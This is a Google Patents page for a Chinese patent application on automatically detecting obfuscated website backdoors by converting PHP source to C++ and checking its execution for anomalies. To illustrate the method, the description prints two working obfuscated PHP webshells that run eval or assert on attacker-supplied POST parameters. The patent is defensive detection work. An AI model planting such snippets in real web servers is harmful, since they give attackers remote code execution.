CN104484603A - 网站后门的检测方法及装置 - Google Patents
网站后门的检测方法及装置 Download PDFInfo
- Publication number
- CN104484603A CN104484603A CN201410855851.4A CN201410855851A CN104484603A CN 104484603 A CN104484603 A CN 104484603A CN 201410855851 A CN201410855851 A CN 201410855851A CN 104484603 A CN104484603 A CN 104484603A
- Authority
- CN
- China
- Prior art keywords
- code
- back door
- preset type
- website
- type
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/57—Certifying or maintaining trusted computer platforms, e.g. secure boots or power-downs, version controls, system software checks, secure updates or assessing vulnerabilities
- G06F21/577—Assessing vulnerabilities and evaluating computer system security
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F2221/00—Indexing scheme relating to security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F2221/03—Indexing scheme relating to G06F21/50, monitoring users, programs or devices to maintain the integrity of platforms
- G06F2221/034—Test or assess a computer or a system
Landscapes
- Engineering & Computer Science (AREA)
- Computer Hardware Design (AREA)
- Computer Security & Cryptography (AREA)
- General Engineering & Computer Science (AREA)
- Software Systems (AREA)
- Theoretical Computer Science (AREA)
- Computing Systems (AREA)
- Physics & Mathematics (AREA)
- General Physics & Mathematics (AREA)
- Information Transfer Between Computers (AREA)
Abstract
本发明公开了一种网站后门的检测方法及装置,涉及信息安全技术领域,主要用于解决网站后门的检测效率较低的问题。所述方法包括:首先获取网站服务器中网页文件的源代码;然后从所述源代码中提取代码类型为第一预置类型的源代码;再将所述第一预置类型的源代码转换为第二预置类型的代码;最后根据所述第二预置类型的代码检测所述网站服务器中是否存在加密后门。本发明适用于对网站后门进行检测。
Description
技术领域
本发明涉及一种信息安全技术领域,尤其涉及一种网站后门的检测方法及装置。
背景技术
随着信息技术的不断发展,互联网的使用人群也越来越多。因此网络安全已经越来越受到人们重视。其中,由于后门是绕过安全性控制而获取对程序或系统访问权的方法,因此,网络服务器入侵者通常通过在网络服务器的程序或系统中加后门的方式,或者利用网络服务器的程序或系统中未删除的后门,对网络服务器的安全造成极大的影响。
目前,在对网络服务器的后门进行检测识别时,通常是采用人工的方式采集大量的样本,然后根据采集的样本,通过人工的方式对网络服务器的源代码进行分析,以检测网络服务器中是否存在后门。然而采用人工的方式检测网络服务器中是否存在后门,需要采集大量的样本,并且检测的过程是由测试人员完成,费时费力,造成网站后门的检测效率较低。
发明内容
有鉴于此,本发明实施例提供一种网站后门的检测方法及装置,主要目的在于提供一种网站后门的自动化识别方式,从而可以提高网站后门的检测效率,保证网站服务器的安全。
依据本发明实施例一个方面,提供了一种网站后门的检测方法,包括:
获取网站服务器中网页文件的源代码;
从所述源代码中提取代码类型为第一预置类型的源代码;
将所述第一预置类型的源代码转换为第二预置类型的代码;
根据所述第二预置类型的代码检测所述网站服务器中是否存在加密后门。
依据本发明实施例的另一个方面,提供了一种网站后门的检测装置,包括:
获取单元,用于获取网站服务器中网页文件的源代码;
提取单元,用于从所述获取单元获取的所述源代码中提取代码类型为第一预置类型的源代码;
转换单元,用于将所述提取单元提取的所述第一预置类型的源代码转换为第二预置类型的代码;
检测单元,用于根据所述转换单元转换的第二预置类型的代码检测所述网站服务器中是否存在加密后门。
借由上述技术方案,本发明实施例提供的技术方案至少具有下列优点:
本发明实施例提供一种网站后门的检测方法及装置,首先获取网站服务器中网页文件的源代码;然后从所述源代码中提取代码类型为第一预置类型的源代码;再将所述第一预置类型的源代码转换为第二预置类型的代码;最后根据所述第二预置类型的代码检测所述网站服务器中是否存在加密后门。与目前通过人工的方式对网络服务器的源代码进行分析,以检测网络服务器中是否存在后门相比,本发明实施例提供一种网络后门自动化识别方式,从而可以提高网站后门的检测效率。
上述说明仅是本发明技术方案的概述,为了能够更清楚了解本发明的技术手段,而可依照说明书的内容予以实施,并且为了让本发明的上述和其它目的、特征和优点能够更明显易懂,以下特举本发明的具体实施方式。
附图说明
通过阅读下文优选实施方式的详细描述,各种其他的优点和益处对于本领域普通技术人员将变得清楚明了。附图仅用于示出优选实施方式的目的,而并不认为是对本发明的限制。而且在整个附图中,用相同的参考符号表示相同的部件。在附图中:
图1示出了本发明实施例提供的一种网站后门的检测方法流程图;
图2示出了本发明实施例提供的另一种网站后门的检测方法流程图;
图3示出了本发明实施例提供的一种网站后门的检测装置结构示意图;
图4示出了本发明实施例提供的另一种网站后门的检测装置结构示意图。
具体实施方式
下面将参照附图更详细地描述本公开的示例性实施例。虽然附图中显示了本公开的示例性实施例,然而应当理解,可以以各种形式实现本公开而不应被这里阐述的实施例所限制。相反,提供这些实施例是为了能够更透彻地理解本公开,并且能够将本公开的范围完整的传达给本领域的技术人员。
本发明实施例提供一种网站后门的检测方法,如图1所示,所述方法包括:
101、获取网站服务器中网页文件的源代码。
其中,所述网站服务器的源代码是指网站服务器的源程序,是指未编译的按照一定的程序语言规范书写的文本文件。例如,用户通过IE(Microsoft Internet Explorer)浏览器,在输入网址栏输入网页地址www.haohaaaa.com后会显示一个网页界面,该网页界面中的内容和功能可以由源代码实现。
对于本发明实施例,获取网站服务器中网页文件的源代码具体可以包括:首先从保存该网站数据的硬盘中读取该网站目录,然后根据读取到的网站目录获取该网站服务器对应的源代码。
102、从所述源代码中提取代码类型为第一预置类型的源代码。
其中,所述代码类型是指编写程序代码所使用的编程语言。第一预置类型可以根据实际需求进行配置,本发明实施例不做限定。例如:第一预置类型可以为PHP(Hypertext Preprocessor,超级文本预处理语言)类型,ASP(Active Server Page,动态服务器页面)类型,JAVA(面向对象的程序设计语言)类型等等。
对于源代码中包含的不同代码类型的代码,都会在代码开头字段中对该代码类型进行声明,例如,对于PHP类型的源代码可以如下所示:
<?php
$uf="snc3";
$ka="IEBldmFbsK";
$pjt="CRfUE9TVF";
$vbl=str_replace("ti","","tistittirti_rtietipltiatice");
$iqw="F6ciddKTs=";
$bkf=$vbl("k","","kbakske6k4k_kdkekckokdke");
$sbp=$vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn");
$mpy=$sbp(″,$bkf($vbl("b","",$ka.$pjt.$uf.$iqw)));$mpy();
?>
可以看出,则根据代码开头字段中的<?php,识别出该源代码的类型为PHP。
103、将所述第一预置类型的源代码转换为第二预置类型的代码;
其中,所述第二预置类型的代码是根据需要转换成的程序设计语言,例如,第二预置类型可以为C语言(C language,计算机程序设计语言),C++(The C++Programming Language,计算机编程语言),JAVA(面向对象的程序设计语言)等等。具体可以根据检测所述网站服务器中是否存在加密后门时所使用的检测脚本程序语言的类型进行确定。例如,可以将步骤102中获取的PHP源代码转换为JAVA代码。
104、根据所述第二预置类型的代码检测所述网站服务器中是否存在加密后门。
其中,后门是指是绕过安全性控制而获取对程序或系统访问权的方法。在软件的开发阶段,通常网络服务器的攻击者,如黑客会在网站服务器中配置加密后门,以增加后门的识别难度,本发明实施例根据所述第二预置类型的代码可以检测并识别出网络服务器的攻击者设置的加密后门,从而可以保证网站服务器的安全性。
本发明实施例提供的一种网站后门的检测方法,首先获取网站服务器中网页文件的源代码;然后从所述源代码中提取代码类型为第一预置类型的源代码;再将所述第一预置类型的源代码转换为第二预置类型的代码;最后根据所述第二预置类型的代码检测所述网站服务器中是否存在加密后门。与目前通过人工的方式对网络服务器的源代码进行分析,以检测网络服务器中是否存在后门相比,本发明实施例提供一种网络后门自动化识别方式,从而可以提高网站后门的检测效率。
进一步地,本发明实施例提供另一种网站后门的检测方法,如图2所示,所述方法包括:
201、获取网站服务器中网页文件的源代码。
其中,所述网站服务器的源代码是指网站服务器的源程序,是指未编译的按照一定的程序神经语言规范书写的文本文件。例如,用户通过IE浏览器,在输入网址栏输入网页地www.baidu.com后会显示一个网页界面,该网页界面中的内容和功能可以由源代码实现。
对于本发明实施例,获取网站服务器中网页文件的源代码具体可以包括:首先从保存该网站数据的硬盘中读取该网站目录,然后根据读取到的网站目录获取该网站服务器对应的源代码。
202、从所述源代码中提取代码类型为第一预置类型的源代码。
其中,所述代码类型是指编写程序代码所使用的编程语言。第一预置类型可以根据实际需求进行配置,本发明实施例不做限定。例如:第一预置类型可以为PHP类型、ASP类型、JAVA类型等等,本发明实施例不做限定。
对于源代码中包含的不同代码类型的代码,都会在代码开头字段中对该代码类型进行声明,例如,对于PHP类型的源代码可以如下所示:
<?php
$a=chr(96^5);
$b=chr(57^79);
$c=chr(15^110);
$d=chr(58^86);
$e='($_POST[air])';
echo$a.$b.$c.$d.$e;
$a.$b.$c.$d.$e;
?>
可以看出,则根据代码开头字段中的<?php,识别出该源代码的类型为PHP。
对于本发明实施例,所述第一预置类型通常为PHP类型。由于PHP类型的代码变形较多,并且在PHP类型的代码中还可以使用不可见的字符,或者将一串完整字符拆分到代码中的不同位置,因此网络服务器的攻击者通常采用PHP类型的代码对后门进行加密。
203、将所述第一预置类型的源代码转换为第二预置类型的代码。
其中,所述第二预置类型的代码是根据需要转换成的程序设计语言,例如,第二预置类型可以为C语言、C++、JAVA(等等。具体可以根据检测所述网站服务器中是否存在加密后门时所使用的检测脚本程序语言的类型进行确定。例如,可以对步骤202中获取的PHP源代码转换为C++代码。
对于本发明实施例,所采用的脚本程序语言的类型可以为C++,因此,为了实现后续对加密后门的检测与识别,将所述第一预置类型的源代码转换为C++的代码。
204、根据所述第二预置类型的代码检测所述网站服务器中是否存在加密后门。
其中,后门是指是绕过安全性控制而获取对程序或系统访问权的方法。在软件的开发阶段,通常网络服务器的攻击者,如黑客会在网站服务器中配置加密后门,以增加后门的识别难度,本发明实施例根据所述第二预置类型的代码可以检测并识别出网络服务器的攻击者设置的加密后门,从而可以保证网站服务器的安全性。
对于本发明实施例,所述根据所述第二预置类型的代码检测所述网站服务器中是否存在加密后门具体可以包括:执行所述第二预置类型的代码,然后判断所述第二预置类型的代码对应的执行结果是否存在异常。
例如,将PHP类型的源代码转换为C++类型的代码,执行转换后的C++类型的代码,然后判断C++类型的代码对应的执行结果是否存在异常。由于PHP类型的源代码中会存在不可见的字符,或者将一串完整字符拆分到代码中的不同位置的情况,因此直接执行PHP类型的源代码,无法对不可见的字符对应的执行结果进行判断,本发明实施例通过将PHP类型的源代码转换为C++类型的代码进行执行,可以将PHP类型的源代码中的不可见字符转换为可执行的C++类型的代码,从而可以对不可见的字符进行正常执行,从而根据执行结果判断是否存在异常行为,进一步保证了网络服务器的安全。
对于本发明实施例,所述根据所述第二预置类型的代码检测所述网站服务器中是否存在加密后门具体还可以包括:检测所述第二预置类型的代码中是否存在异常变量。
例如,将PHP类型的源代码转换为C++类型的代码,然后判断C++类型的代码中是否存在异常变量。由于PHP类型的源代码中会存在不可见的字符,或者将一串完整字符拆分到代码中的不同位置的情况,因此无法对PHP类型的源代码中不可见的字符进行识别,本发明实施例通过将PHP类型的源代码转换为C++类型的代码进行执行,可以将PHP类型的源代码中的不可见字符转换为可识别的C++类型的代码,从而可以根据不可见的字符对应的C++类型的代码,判断不可见的字符是否为异常变量,进一步保证了网络服务器的安全。
205、若所述第二预置类型的代码对应的执行结果存在异常或是所述第二预置类型的代码中存在异常变量,则确认所述网站服务器中存在加密后门。
206、显示或者播放告警提示信息。
其中,所述告警提示信息可以为文本提示信息、音频提示信息、视频提示信息等,本发明实施例不做限定。例如,如确认所述网站服务器中存在加密后门,则可以弹出文本提示框“发现加密后门”,或是输出“发现加密后门”的音频或视频提示信息。通过显示或者播放告警提示信息,可以提示用户当前网络服务器存在安全隐患,从而及时消除网络服务器的安全隐患。
207、删除所述网站服务器中的加密后门,和/或删除所述网站服务器中所述加密后门对应的文件。
具体地,可以将网络服务器对应的源代码中,该加密后门对应的源代码删除。或者从网络服务器中获取携带有该加密后门的文件,将加密后门对应的文件删除。
本发明实施例提供的另一种网站后门的检测方法,首先获取网站服务器中网页文件的源代码;然后从所述源代码中提取代码类型为第一预置类型的源代码;再将所述第一预置类型的源代码转换为第二预置类型的代码;最后根据所述第二预置类型的代码检测所述网站服务器中是否存在加密后门。与目前通过人工的方式对网络服务器的源代码进行分析,以检测网络服务器中是否存在后门相比,本发明实施例提供一种网络后门自动化识别方式,从而可以提高网站后门的检测效率。
进一步地,作为图1所示方法的具体实现,本发明实施例提供一种网站后门的检测装置,如图3所示,获取单元301、提取单元302、转换单元303、检测单元304;
获取单元301,用于获取网站服务器中网页文件的源代码;
提取单元302,用于从所述获取单元301获取的所述源代码中提取代码类型为第一预置类型的源代码;
转换单元303,用于将所述提取单元302提取的所述第一预置类型的源代码转换为第二预置类型的代码;
检测单元304,用于根据所述转换单元303转换的第二预置类型的代码检测所述网站服务器中是否存在加密后门。
需要说明的是,本发明实施例提供的网站后门的检测装置所涉及各功能单元的其他相应描述,可以参考图1所示方法中的对应描述,在此不再赘述。
本发明实施例提供一种网站后门的检测装置,首先获取网站服务器中网页文件的源代码;然后从所述源代码中提取代码类型为第一预置类型的源代码;再将所述第一预置类型的源代码转换为第二预置类型的代码;最后根据所述第二预置类型的代码检测所述网站服务器中是否存在加密后门。与目前通过人工的方式对网络服务器的源代码进行分析,以检测网络服务器中是否存在后门相比,本发明实施例提供一种网络后门自动化识别方式,从而可以提高网站后门的检测效率。
再进一步地,作为图2所示方法的具体实现,本发明实施例提供另一种网站后门的检测装置,如图4所示,获取单元401、提取单元402、转换单元403、检测单元404;
获取单元401,用于获取网站服务器中网页文件的源代码;
提取单元402,用于从所述获取单元401获取的所述源代码中提取代码类型为第一预置类型的源代码;
转换单元403,用于将所述提取单元402提取的所述第一预置类型的源代码转换为第二预置类型的代码;
检测单元404,用于根据所述转换单元403转换的第二预置类型的代码检测所述网站服务器中是否存在加密后门。
进一步地,所述检测单元404包括:
执行模块404a,用于执行所述第二预置类型的代码;
判断模块404b,用于判断所述第二预置类型的代码对应的执行结果是否存在异常。
进一步地,所述装置还包括:
确认单元405,用于若所述第二预置类型的代码对应的执行结果存在异常,则确认所述网站服务器中存在加密后门。
对于本发明实施例,所述检测单元404,具体还用于检测所述第二预置类型的代码中是否存在异常变量。
对于本发明实施例,所述确认单元405,具体还用于若所述第二预置类型的代码中存在异常变量,则确认所述网站服务器中存在加密后门。
再进一步地,所述装置还包括:
显示单元406,用于显示或者播放告警提示信息;
删除单元407,用于删除所述网站服务器中的加密后门,和/或删除所述网站服务器中所述加密后门对应的文件。
在本发明实施例中,所述第一预置类型为超级文本预处理语言PHP类型,所述第二预置类型为C++类型。
需要说明的是,本发明实施例提供的网站后门的检测装置所涉及各功能单元的其他相应描述,可以参考图2所示方法中的对应描述,在此不再赘述。
本发明实施例提供的另一种网站后门的检测装置,首先获取网站服务器中网页文件的源代码;然后从所述源代码中提取代码类型为第一预置类型的源代码;再将所述第一预置类型的源代码转换为第二预置类型的代码;最后根据所述第二预置类型的代码检测所述网站服务器中是否存在加密后门。与目前通过人工的方式对网络服务器的源代码进行分析,以检测网络服务器中是否存在后门相比,本发明实施例提供一种网络后门自动化识别方式,从而可以提高网站后门的检测效率。
本发明的实施例公开了:
A1、一种网站后门的检测方法,包括:
获取网站服务器中网页文件的源代码;
从所述源代码中提取代码类型为第一预置类型的源代码;
将所述第一预置类型的源代码转换为第二预置类型的代码;
根据所述第二预置类型的代码检测所述网站服务器中是否存在加密后门。
A2、如A1所述的网站后门的检测方法,所述根据所述第二预置类型的代码检测所述网站服务器中是否存在加密后门包括:
执行所述第二预置类型的代码;
判断所述第二预置类型的代码对应的执行结果是否存在异常。
A3、如A2所述的网站后门的检测方法,所述判断所述第二预置类型的代码对应的执行结果是否存在异常之后,还包括:
若所述第二预置类型的代码对应的执行结果存在异常,则确认所述网站服务器中存在加密后门。
A4、如A1所述的网站后门的检测方法,所述根据所述第二预置类型的代码检测所述网站服务器中是否存在加密后门包括:
检测所述第二预置类型的代码中是否存在异常变量。
A5、如A4所述的网站后门的检测方法,所述检测所述第二预置类型的代码中是否存在异常变量之后,还包括:
若所述第二预置类型的代码中存在异常变量,则确认所述网站服务器中存在加密后门。
A6、如A3或A5所述的网站后门的检测方法,所述确认所述网站服务器中存在加密后门之后,还包括:
显示或者播放告警提示信息;
删除所述网站服务器中的加密后门;和/或
删除所述网站服务器中所述加密后门对应的文件。
A7、如A1-A5任一项所述的网站后门的检测方法,所述第一预置类型为超级文本预处理语言PHP类型,所述第二预置类型为C++类型。
B8、一种网站后门的检测装置,包括:
获取单元,用于获取网站服务器中网页文件的源代码;
提取单元,用于从所述获取单元获取的所述源代码中提取代码类型为第一预置类型的源代码;
转换单元,用于将所述提取单元提取的所述第一预置类型的源代码转换为第二预置类型的代码;
检测单元,用于根据所述转换单元转换的第二预置类型的代码检测所述网站服务器中是否存在加密后门。
B9、如B8所述的网站后门的检测装置,所述检测单元包括:
执行模块,用于执行所述第二预置类型的代码;
判断模块,用于判断所述第二预置类型的代码对应的执行结果是否存在异常。
B10、如B9所述的网站后门的检测装置,所述装置还包括:
确认单元,用于若所述第二预置类型的代码对应的执行结果存在异常,则确认所述网站服务器中存在加密后门。
B11、如B8所述的网站后门的检测装置,
所述检测单元,还用于检测所述第二预置类型的代码中是否存在异常变量。
B12、如B10或B11所述的网站后门的检测装置,
所述确认单元,还用于若所述第二预置类型的代码中存在异常变量,则确认所述网站服务器中存在加密后门。
B13、如B10或B12所述的网站后门的检测装置,所述装置还包括:
显示单元,用于显示或者播放告警提示信息;
删除单元,用于删除所述网站服务器中的加密后门,和/或删除所述网站服务器中所述加密后门对应的文件。
B14、如B8-B11任一项所述的网站后门的检测装置,所述第一预置类型为超级文本预处理语言PHP类型,所述第二预置类型为C++类型。
在上述实施例中,对各个实施例的描述都各有侧重,某个实施例中没有详述的部分,可以参见其他实施例的相关描述。
可以理解的是,上述方法及装置中的相关特征可以相互参考。另外,上述实施例中的“第一”、“第二”等是用于区分各实施例,而并不代表各实施例的优劣。
所属领域的技术人员可以清楚地了解到,为描述的方便和简洁,上述描述的系统,装置和单元的具体工作过程,可以参考前述方法实施例中的对应过程,在此不再赘述。
在此提供的算法和显示不与任何特定计算机、虚拟系统或者其它设备固有相关。各种通用系统也可以与基于在此的示教一起使用。根据上面的描述,构造这类系统所要求的结构是显而易见的。此外,本发明也不针对任何特定编程语言。应当明白,可以利用各种编程语言实现在此描述的本发明的内容,并且上面对特定语言所做的描述是为了披露本发明的最佳实施方式。
在此处所提供的说明书中,说明了大量具体细节。然而,能够理解,本发明的实施例可以在没有这些具体细节的情况下实践。在一些实例中,并未详细示出公知的方法、结构和技术,以便不模糊对本说明书的理解。
类似地,应当理解,为了精简本公开并帮助理解各个发明方面中的一个或多个,在上面对本发明的示例性实施例的描述中,本发明的各个特征有时被一起分组到单个实施例、图、或者对其的描述中。然而,并不应将该公开的方法解释成反映如下意图:即所要求保护的本发明要求比在每个权利要求中所明确记载的特征更多的特征。更确切地说,如下面的权利要求书所反映的那样,发明方面在于少于前面公开的单个实施例的所有特征。因此,遵循具体实施方式的权利要求书由此明确地并入该具体实施方式,其中每个权利要求本身都作为本发明的单独实施例。
本领域那些技术人员可以理解,可以对实施例中的设备中的模块进行自适应性地改变并且把它们设置在与该实施例不同的一个或多个设备中。可以把实施例中的模块或单元或组件组合成一个模块或单元或组件,以及此外可以把它们分成多个子模块或子单元或子组件。除了这样的特征和/或过程或者单元中的至少一些是相互排斥之外,可以采用任何组合对本说明书(包括伴随的权利要求、摘要和附图)中公开的所有特征以及如此公开的任何方法或者设备的所有过程或单元进行组合。除非另外明确陈述,本说明书(包括伴随的权利要求、摘要和附图)中公开的每个特征可以由提供相同、等同或相似目的的替代特征来代替。
此外,本领域的技术人员能够理解,尽管在此所述的一些实施例包括其它实施例中所包括的某些特征而不是其它特征,但是不同实施例的特征的组合意味着处于本发明的范围之内并且形成不同的实施例。例如,在下面的权利要求书中,所要求保护的实施例的任意之一都可以以任意的组合方式来使用。
本发明的各个部件实施例可以以硬件实现,或者以在一个或者多个处理器上运行的软件模块实现,或者以它们的组合实现。本领域的技术人员应当理解,可以在实践中使用微处理器或者数字信号处理器(DSP)来实现根据本发明实施例的镜像网站识别方法及装置中的一些或者全部部件的一些或者全部功能。本发明还可以实现为用于执行这里所描述的方法的一部分或者全部的设备或者装置程序(例如,计算机程序和计算机程序产品)。这样的实现本发明的程序可以存储在计算机可读介质上,或者可以具有一个或者多个信号的形式。这样的信号可以从因特网网站上下载得到,或者在载体信号上提供,或者以任何其他形式提供。
应该注意的是上述实施例对本发明进行说明而不是对本发明进行限制,并且本领域技术人员在不脱离所附权利要求的范围的情况下可设计出替换实施例。在权利要求中,不应将位于括号之间的任何参考符号构造成对权利要求的限制。单词“包含”不排除存在未列在权利要求中的元件或步骤。位于元件之前的单词“一”或“一个”不排除存在多个这样的元件。本发明可以借助于包括有若干不同元件的硬件以及借助于适当编程的计算机来实现。在列举了若干装置的单元权利要求中,这些装置中的若干个可以是通过同一个硬件项来具体体现。单词第一、第二、以及第三等的使用不表示任何顺序。可将这些单词解释为名称。
Claims (10)
1.一种网站后门的检测方法,其特征在于,包括:
获取网站服务器中网页文件的源代码;
从所述源代码中提取代码类型为第一预置类型的源代码;
将所述第一预置类型的源代码转换为第二预置类型的代码;
根据所述第二预置类型的代码检测所述网站服务器中是否存在加密后门。
2.根据权利要求1所述的网站后门的检测方法,其特征在于,所述根据所述第二预置类型的代码检测所述网站服务器中是否存在加密后门包括:
执行所述第二预置类型的代码;
判断所述第二预置类型的代码对应的执行结果是否存在异常。
3.根据权利要求2所述的网站后门的检测方法,其特征在于,所述判断所述第二预置类型的代码对应的执行结果是否存在异常之后,还包括:
若所述第二预置类型的代码对应的执行结果存在异常,则确认所述网站服务器中存在加密后门。
4.根据权利要求1所述的网站后门的检测方法,其特征在于,所述根据所述第二预置类型的代码检测所述网站服务器中是否存在加密后门包括:
检测所述第二预置类型的代码中是否存在异常变量。
5.根据权利要求4所述的网站后门的检测方法,其特征在于,所述检测所述第二预置类型的代码中是否存在异常变量之后,还包括:
若所述第二预置类型的代码中存在异常变量,则确认所述网站服务器中存在加密后门。
6.根据权利要求3或5所述的网站后门的检测方法,其特征在于,所述确认所述网站服务器中存在加密后门之后,还包括:
显示或者播放告警提示信息;
删除所述网站服务器中的加密后门;和/或
删除所述网站服务器中所述加密后门对应的文件。
7.根据权利要求1-5任一项所述的网站后门的检测方法,其特征在于,所述第一预置类型为超级文本预处理语言PHP类型,所述第二预置类型为C++类型。
8.一种网站后门的检测装置,其特征在于,包括:
获取单元,用于获取网站服务器中网页文件的源代码;
提取单元,用于从所述获取单元获取的所述源代码中提取代码类型为第一预置类型的源代码;
转换单元,用于将所述提取单元提取的所述第一预置类型的源代码转换为第二预置类型的代码;
检测单元,用于根据所述转换单元转换的第二预置类型的代码检测所述网站服务器中是否存在加密后门。
9.根据权利要求8所述的网站后门的检测装置,其特征在于,所述检测单元包括:
执行模块,用于执行所述第二预置类型的代码;
判断模块,用于判断所述第二预置类型的代码对应的执行结果是否存在异常。
10.根据权利要求9所述的网站后门的检测装置,其特征在于,所述装置还包括:
确认单元,用于若所述第二预置类型的代码对应的执行结果存在异常,则确认所述网站服务器中存在加密后门。
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201410855851.4A CN104484603A (zh) | 2014-12-31 | 2014-12-31 | 网站后门的检测方法及装置 |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201410855851.4A CN104484603A (zh) | 2014-12-31 | 2014-12-31 | 网站后门的检测方法及装置 |
Publications (1)
| Publication Number | Publication Date |
|---|---|
| CN104484603A true CN104484603A (zh) | 2015-04-01 |
Family
ID=52759144
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN201410855851.4A Pending CN104484603A (zh) | 2014-12-31 | 2014-12-31 | 网站后门的检测方法及装置 |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN104484603A (zh) |
Cited By (5)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN104796426A (zh) * | 2015-04-29 | 2015-07-22 | 上海络安信息技术有限公司 | 网页后门的检测方法 |
| CN106301974A (zh) * | 2015-05-14 | 2017-01-04 | 阿里巴巴集团控股有限公司 | 一种网站后门检测方法和装置 |
| CN107888554A (zh) * | 2016-09-30 | 2018-04-06 | 腾讯科技(深圳)有限公司 | 服务器攻击的检测方法和装置 |
| CN108062474A (zh) * | 2016-11-08 | 2018-05-22 | 阿里巴巴集团控股有限公司 | 文件的检测方法及装置 |
| CN108664791A (zh) * | 2017-03-29 | 2018-10-16 | 腾讯科技(深圳)有限公司 | 一种超文本预处理器代码中的网页后门检测方法及装置 |
Citations (4)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN101515318A (zh) * | 2009-04-03 | 2009-08-26 | 深圳市腾讯计算机系统有限公司 | 一种识别vbs网页木马的方法和装置 |
| CN102542201A (zh) * | 2011-12-26 | 2012-07-04 | 北京奇虎科技有限公司 | 一种网页中恶意代码的检测方法及系统 |
| CN102955913A (zh) * | 2011-08-25 | 2013-03-06 | 腾讯科技(深圳)有限公司 | 一种网页挂马检测方法及系统 |
| CN103607413A (zh) * | 2013-12-05 | 2014-02-26 | 北京奇虎科技有限公司 | 一种网站后门程序检测的方法及装置 |
-
2014
- 2014-12-31 CN CN201410855851.4A patent/CN104484603A/zh active Pending
Patent Citations (4)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN101515318A (zh) * | 2009-04-03 | 2009-08-26 | 深圳市腾讯计算机系统有限公司 | 一种识别vbs网页木马的方法和装置 |
| CN102955913A (zh) * | 2011-08-25 | 2013-03-06 | 腾讯科技(深圳)有限公司 | 一种网页挂马检测方法及系统 |
| CN102542201A (zh) * | 2011-12-26 | 2012-07-04 | 北京奇虎科技有限公司 | 一种网页中恶意代码的检测方法及系统 |
| CN103607413A (zh) * | 2013-12-05 | 2014-02-26 | 北京奇虎科技有限公司 | 一种网站后门程序检测的方法及装置 |
Cited By (8)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN104796426A (zh) * | 2015-04-29 | 2015-07-22 | 上海络安信息技术有限公司 | 网页后门的检测方法 |
| CN104796426B (zh) * | 2015-04-29 | 2018-04-27 | 上海络安信息技术有限公司 | 网页后门的检测方法 |
| CN106301974A (zh) * | 2015-05-14 | 2017-01-04 | 阿里巴巴集团控股有限公司 | 一种网站后门检测方法和装置 |
| CN107888554A (zh) * | 2016-09-30 | 2018-04-06 | 腾讯科技(深圳)有限公司 | 服务器攻击的检测方法和装置 |
| CN107888554B (zh) * | 2016-09-30 | 2020-09-01 | 腾讯科技(深圳)有限公司 | 服务器攻击的检测方法和装置 |
| CN108062474A (zh) * | 2016-11-08 | 2018-05-22 | 阿里巴巴集团控股有限公司 | 文件的检测方法及装置 |
| CN108062474B (zh) * | 2016-11-08 | 2022-01-11 | 阿里巴巴集团控股有限公司 | 文件的检测方法及装置 |
| CN108664791A (zh) * | 2017-03-29 | 2018-10-16 | 腾讯科技(深圳)有限公司 | 一种超文本预处理器代码中的网页后门检测方法及装置 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| US10621349B2 (en) | Detection of malware using feature hashing | |
| CN104484603A (zh) | 网站后门的检测方法及装置 | |
| US11373065B2 (en) | Dictionary based deduplication of training set samples for machine learning based computer threat analysis | |
| CN107241296B (zh) | 一种Webshell的检测方法及装置 | |
| CN101751530B (zh) | 检测漏洞攻击行为的方法及设备 | |
| CN102663296A (zh) | 面向网页JavaScript恶意代码的智能检测方法 | |
| CN103810428B (zh) | 一种宏病毒检测方法及装置 | |
| CN101820419A (zh) | 一种挂马网页中网页木马挂接点自动定位方法 | |
| CN103716394B (zh) | 下载文件的管理方法及装置 | |
| CN104462985A (zh) | bat漏洞的检测方法以及装置 | |
| CN106384048A (zh) | 一种威胁信息处理方法与装置 | |
| CN107341399A (zh) | 评估代码文件安全性的方法及装置 | |
| CN103678487A (zh) | 一种网页快照的生成方法和装置 | |
| CN105653949B (zh) | 一种恶意程序检测方法及装置 | |
| CN103473501A (zh) | 一种基于云安全的恶意软件追踪方法 | |
| CN104331663A (zh) | web shell的检测方法以及web服务器 | |
| CN105550581A (zh) | 一种恶意代码检测方法及装置 | |
| CN104080058A (zh) | 信息处理方法及装置 | |
| CN103617390A (zh) | 一种恶意网页判断方法、装置和系统 | |
| CN104134019A (zh) | 检测脚本病毒的方法和装置 | |
| Park et al. | Forensic investigation framework for cryptocurrency wallet in the end device | |
| Cosovan et al. | A practical guide for detecting the java script-based malware using hidden markov models and linear classifiers | |
| CN103838865A (zh) | 用于挖掘时效性种子页的方法及装置 | |
| CN107798244A (zh) | 一种检测远程代码执行漏洞的方法及装置 | |
| CN105553767A (zh) | 网站后门文件检测方法及装置 |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| C06 | Publication | ||
| PB01 | Publication | ||
| C10 | Entry into substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| C41 | Transfer of patent application or patent right or utility model | ||
| TA01 | Transfer of patent application right |
